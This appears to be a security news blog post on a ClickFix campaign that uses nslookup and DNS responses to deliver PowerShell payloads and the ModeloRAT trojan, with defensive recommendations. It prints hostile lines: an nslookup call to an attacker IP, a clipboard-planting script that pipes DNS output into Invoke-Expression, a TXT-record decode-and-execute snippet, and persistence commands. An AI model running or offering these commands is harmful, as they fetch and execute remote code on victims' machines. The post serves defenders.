Listen to this Post

Introduction
Cybersecurity researchers at Microsoft have uncovered a sophisticated new variant of the ClickFix social engineering campaign that leverages the Windows nslookup DNS utility as a covert malware delivery channel . Instead of relying on traditional web-based downloads, attackers now trick victims into executing DNS lookups that retrieve malicious payloads directly from attacker-controlled DNS responses, effectively blending malicious activity with legitimate network traffic. This technique marks a significant evolution in threat actor tradecraft, ultimately leading to the deployment of remote access trojans like ModeloRAT and highlighting the critical need for organizations to monitor DNS behavior and restrict unauthorized command execution .
Learning Objectives
- Understand how attackers abuse the Windows nslookup utility to deliver malware via DNS responses
- Analyze the complete attack chain from initial social engineering to ModeloRAT deployment
- Identify effective mitigation strategies including DNS monitoring and execution policy enforcement
You Should Know
1. Anatomy of the DNS-Based ClickFix Attack
The attack begins with social engineering lures, typically fake CAPTCHA verifications, browser error messages, or fraudulent “fix it” instructions displayed on compromised websites . Victims are instructed to open the Windows Run dialog (Win+R) and execute a seemingly harmless nslookup command. This command queries an attacker-controlled DNS server rather than the system’s default resolver.
Example of the Malicious Command:
nslookup -type=ANY example.com 84[.]21.189[.]20
When executed, this command performs a DNS lookup against the threat actor’s server at 84.21.189.20 . The attacker-controlled DNS server responds with a specially crafted reply where the `Name:` field contains a malicious PowerShell script instead of a legitimate domain name. The command output is filtered to extract this field, and the script is immediately executed via cmd.exe.
What This Does: The technique transforms DNS into a lightweight staging channel, allowing attackers to validate active targets and deliver second-stage payloads without generating traditional web request alerts . Since DNS traffic is ubiquitous and often poorly monitored, this evasion method helps malicious activity blend into normal network communications.
2. Second-Stage Payload Delivery and Reconnaissance
Once the initial PowerShell script executes, it downloads a ZIP archive from attacker infrastructure—observed as `hxxp://azwsappdev[.]com/wdhmgpmihudkueq[.]zip` . This archive contains a portable Python runtime environment and malicious Python scripts designed for host and domain reconnaissance.
Extracted Python Reconnaissance Commands:
import os, socket, subprocess
System information gathering
os.system('systeminfo > C:\Windows\Temp\sysinfo.txt')
os.system('ipconfig /all >> C:\Windows\Temp\network.txt')
os.system('net view /domain >> C:\Windows\Temp\domains.txt')
os.system('tasklist >> C:\Windows\Temp\processes.txt')
Step-by-Step Guide: The Python script performs extensive discovery operations including enumerating running processes, identifying domain-joined status, mapping network shares, and collecting system configuration data. This reconnaissance helps attackers determine the value of the compromised host and whether to deploy the final RAT payload .
3. ModeloRAT Deployment and Persistence Mechanisms
The final stage delivers ModeloRAT, a Python-based remote access trojan that provides attackers with full control over infected systems . Persistence is achieved through multiple mechanisms:
Persistence Setup Commands:
' script.vbs - VBScript launcher for ModeloRAT
CreateObject("Wscript.Shell").Run "python C:\Users\Public\modelorat.py", 0, False
:: Create startup shortcut copy C:\Users\Public\MonitoringService.lnk "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
The malware creates `%APPDATA%\WPy64-31401\python\script.vbs` and a corresponding Windows shortcut named `MonitoringService.lnk` in the Startup folder, ensuring automatic execution at every system boot . ModeloRAT supports arbitrary shell command execution, file transfer, and SOCKS5 proxy capabilities, enabling lateral movement within enterprise networks .
4. Browser Extension Vector: The NexShield Connection
Researchers have identified that this DNS-based ClickFix variant shares infrastructure with the NexShield malicious browser extension campaign . NexShield impersonated the legitimate uBlock Origin Lite ad blocker on the Chrome Web Store. Once installed, the extension overwhelms the browser with requests causing crashes, then displays fake “CrashFix” security warnings instructing users to paste and execute PowerShell commands.
Fake CrashFix Popup Code:
// Simulated browser freeze and fake security alert
setTimeout(function() {
alert("CRITICAL ERROR: Browser stability issues detected. Click OK to run Microsoft Diagnostic Tool.");
navigator.clipboard.writeText('powershell -Command "Invoke-Expression (nslookup -type=TXT malicious.example.com 84.21.189.20)"');
}, 600000); // Triggers after 10 minutes
This approach targets domain-joined corporate machines specifically, delivering the more sophisticated ModeloRAT payload to enterprise environments where lateral movement opportunities exist .
5. DNS TXT Record Abuse for Payload Staging
A related technique involves abusing DNS TXT records to stage malicious commands . The initial script performs a DNS lookup for TXT records containing encoded PowerShell instructions, which are then parsed and executed in memory.
DNS TXT Record Query Example:
$dns = Resolve-DnsName -Name "update.example.com" -Type TXT $payload = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($dns.Strings)) Invoke-Expression $payload
This fileless retrieval method leaves minimal forensic traces while allowing attackers to dynamically update payloads by modifying DNS records .
6. Detection and Mitigation Strategies
Organizations can implement multiple defensive measures to block this attack vector:
Windows Policy Configurations:
Disable Windows Run dialog via Group Policy Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" -Name "NoRun" -Value 1 Restrict PowerShell execution policy Set-ExecutionPolicy -ExecutionPolicy Restricted -Scope LocalMachine Block unauthorized DNS servers via Windows Firewall New-NetFirewallRule -DisplayName "Block Malicious DNS" -Direction Outbound -Protocol UDP -RemotePort 53 -RemoteAddress 84.21.189.20 -Action Block
DNS Monitoring with Splunk Query:
index=network sourcetype=dns | stats count by query, dest_ip | where dest_ip NOT IN (8.8.8.8, 1.1.1.1, [company DNS servers]) | sort - count
Linux-Based Detection:
Monitor DNS queries to suspicious servers sudo tcpdump -i any -n port 53 and host not 8.8.8.8 and host not 1.1.1.1 Check for unusual nslookup commands in bash history grep "nslookup" ~/.bash_history | grep -v "8.8.8.8"
7. Enterprise Hardening Recommendations
Security teams should adopt a layered defense approach:
Application Control via AppLocker:
<AppLockerPolicy> <RuleCollection Type="Exe"> <FilePathRule Id="1" Action="Deny" User="Everyone" Path="%WINDIR%\System32\nslookup.exe" /> </RuleCollection> </AppLockerPolicy>
DNS Filtering with Pi-hole/Umbrella:
Add malicious domains to blocklist echo "84.21.189.20" >> /etc/pihole/blacklist.txt echo "azwsappdev.com" >> /etc/pihole/blacklist.txt pihole restartdns
User Awareness Training: Educate users never to execute commands from websites, popups, or unsolicited instructions, regardless of how legitimate they appear .
What Undercode Say
The emergence of DNS-based ClickFix attacks represents a fundamental shift in social engineering tradecraft, demonstrating that attackers will exploit even the most fundamental internet protocols to achieve stealth. By abusing nslookup and DNS responses, threat actors bypass traditional web filtering and download detection mechanisms, forcing defenders to reconsider what constitutes “normal” network traffic. The connection between ClickFix campaigns and ModeloRAT deployment highlights the increasing sophistication of initial access brokers who now combine browser-based social engineering with DNS tunneling techniques. Organizations must recognize that DNS traffic, long trusted and largely unmonitored, has become a primary threat vector requiring the same scrutiny applied to HTTP communications. The involvement of KongTuke threat actors and their focus on domain-joined enterprise machines suggests that these attacks are not opportunistic but strategically designed for maximum impact . Ultimately, the most effective defense remains user education combined with strict execution policies—because no technical control can prevent a user from voluntarily infecting their own system when tricked by convincing social engineering.
Key Takeaway 1: DNS is no longer just a resolution protocol but an active attack surface requiring continuous monitoring and anomaly detection.
Key Takeaway 2: The ClickFix technique’s evolution proves that procedural trust abuse is more dangerous than technical vulnerability exploitation.
Prediction
DNS-based malware delivery will likely expand beyond nslookup to include other legitimate networking tools like tracert, pathping, and even dig on Linux systems. As Microsoft and security vendors improve detection of PowerShell and command-line abuse, attackers will increasingly turn to living-off-the-land binaries (LOLBins) and protocol tunneling to evade endpoint detection. The integration of DNS tunneling with browser extension-based social engineering suggests a future where initial compromise occurs entirely through trusted applications and protocols, making traditional network perimeter defenses obsolete. Expect threat actors to leverage DNS over HTTPS (DoH) to further encrypt malicious queries, complicating inspection while maintaining the appearance of legitimate encrypted traffic. Organizations must prepare for a threat landscape where every protocol and utility becomes a potential attack vector, requiring zero-trust principles applied even to core internet infrastructure.
References
- The Hacker News. (2026). Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging
- ThaiCERT. (2026). New ClickFix Campaign Uses nslookup to Deliver PowerShell Payloads via DNS
3. Dbappsecurity. (2026). 新型ClickFix攻击滥用nslookup通过DNS检索PowerShell恶意载荷
- HEAL Security. (2026). Attackers Using DNS TXT Records in ClickFix Script
- BleepingComputer. (2026). New ClickFix attack abuses nslookup to retrieve PowerShell payload via DNS
- Security Affairs. (2026). Microsoft alerts on DNS-based ClickFix variant delivering malware via nslookup
- Help Net Security. (2026). Fake browser crash alerts turn Chrome extension into enterprise backdoor
8. OffSeq. (2026). Dissecting CrashFix: KongTuke’s New Toy
- Cybernoz. (2026). New Clickfix Attack Uses DNS Hijacking to Spread Malware
▶️ Related Video (72% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Charles Charlie – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


